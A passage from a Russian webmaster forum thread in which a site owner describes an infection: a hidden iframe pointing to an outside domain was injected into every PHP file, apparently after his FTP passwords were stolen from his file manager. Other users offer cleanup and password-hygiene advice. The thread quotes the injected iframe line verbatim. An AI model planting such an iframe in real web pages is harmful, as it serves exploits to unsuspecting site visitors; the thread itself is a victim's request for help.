Вредоносный фрейм на сайте, помогите?

T
На сайте с 22.02.2008
Offline
141
1841

Доброе утро уважаемые форумчане, вчера всё было нормально, сегодня с утра смотрю сайт не доуступен, перехожу по нему, там белый экран и начинает грузиться windows media player, потом касперыч промолчал, и я понял что поймал чтото, в итоге запустил проверку, он мне в документах находит:

Exploit.Java.Agent.ai

Exploit.Java.Agent.aj

Exploit.Java.Agent.ak

Exploit.Java.Agent.al

Захожу на ftp сайта и вижу что файлы php изменялись, в каждом из них вот такой фрейм невидимый

<div style="visibility:hidden"><iframe src="http://meinvorun.biz/zl/s2/" width=100 height=80></iframe></div>

Кто нибудь подскажите что этот фрейм делает? И как меня взломали, целый год всё было тихо, админка изменённая нелегко найти + все пароли очень сложные, но только в тотале пароль от ftp был большие и малые буквы + конечно сам виноват, хранил их там же, можете советов дать?

п.с. всё перехожу на Linux нафиг, спасибо!

[Удален]
#1
Troyan:
Доброе утро уважаемые форумчане, вчера всё было нормально, сегодня с утра смотрю сайт не доуступен, перехожу по нему, там белый экран и начинает грузиться windows media player, потом касперыч промолчал, и я понял что поймал чтото, в итоге запустил проверку, он мне в документах находит:

Exploit.Java.Agent.ai
Exploit.Java.Agent.aj
Exploit.Java.Agent.ak
Exploit.Java.Agent.al

Захожу на ftp сайта и вижу что файлы php изменялись, в каждом из них вот такой фрейм невидимый

<div style="visibility:hidden"><iframe src="http://meinvorun.biz/zl/s2/" width=100 height=80></iframe></div>


Кто нибудь подскажите что этот фрейм делает? И как меня взломали, целый год всё было тихо, админка изменённая нелегко найти + все пароли очень сложные, но только в тотале пароль от ftp был большие и малые буквы + конечно сам виноват, хранил их там же, можете советов дать?

п.с. всё перехожу на Linux нафиг, спасибо!

Могли по тоталу Вас ломануть (утащить пароли) смените все пароли, проверьте антивирусником свой компьютер, желательно Авирой и ищите сам вирус на ФТП. У меня вирус был в фаилах sape.php and linkfeed.php.Еще как вариант можно скачать весь сайт к себе на комп и проверить Авирой.

T
На сайте с 22.02.2008
Offline
141
#2

CrimeaLand, спасибо, как раз есть и линкфид и сапа, сейчас проверю файлы, спасибо большое, пароли сменил, кстати на форуме маула многие на свеб негодуют: http://www.maultalk.com/topic61173s10.html?gopid=719687&#entry719687

DyaDya
На сайте с 11.04.2007
Offline
147
#3

Все советы по поиску и удалению вирей с сайтов уже как-то дал.

1. Сначала лечим свой комп.

2. Затем меняем все Фтп, да другие доступы тоже не помешает.

3. Лечим сайт.

p.s. Без антивирей по инету не лазить.

Свеб здесь тоже любят:

/ru/forum/454352

/ru/forum/435991

Выбирайте качественный хостинг (http://vashmaster.ru/informaciya/o_poleznyh_programmah/news83.php) и продвигайте сайты в СЕОПУЛЬТ (http://seopult.ru/ref.php?ref=72b5ed9561fe66a1). А на «SAPE» я в обиде :) Не упрекайте за очепятки, пишу вслепую (http://ergosolo.ru/) и также делаю сайты (http://www.vashmaster.ru/) ;)
T
На сайте с 22.02.2008
Offline
141
#4

DyaDya, очень дельный совет спасибо, а не подскажете вот:

1. Какими ftp менеджером тогда пользоваться? Какой шифрует пароли?

2. Решит ли данную проблему полный переход на Linux?

DyaDya
На сайте с 11.04.2007
Offline
147
#5
Troyan:
1. Какими ftp менеджером тогда пользоваться? Какой шифрует пароли?

Надо пользоваться тогда sftp, но пароли воруют с вашего компа, значит, вирь всё равно их утащит. Поэтому хранить пароли в самих фтп-менеджерах точно не стоит!

Troyan:
2. Решит ли данную проблему полный переход на Linux?

Возможно, решит частично. Но об элементарных мерах безопасности всё равно забывать не стоит ;)

T
На сайте с 22.02.2008
Offline
141
#6

Премного благодарен всем кто откликнулся на проблему в столь ранний час, спасибо!

GP
На сайте с 04.06.2010
Offline
97
#7

у меня такая же фигня сегодня на двух моих досках

http://www.zoo-zoo.ru

http://www.detkam-detkam.ru

не пойму откуда могло взяться

T
На сайте с 22.02.2008
Offline
141
#8

GoldenPuma, тема для обсуждения, а не чтобы спалить всем свои доски!

[Удален]
#9

Та же хрень была, восстановил бекапы, сменил пароли, тоталкомандер снес. Какое время загрузки файлов? У меня 19.44.

T
На сайте с 22.02.2008
Offline
141
#10

Phessiv, проверил именно абсолютно такое! Как это понимать? То есть свеб хакнули?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий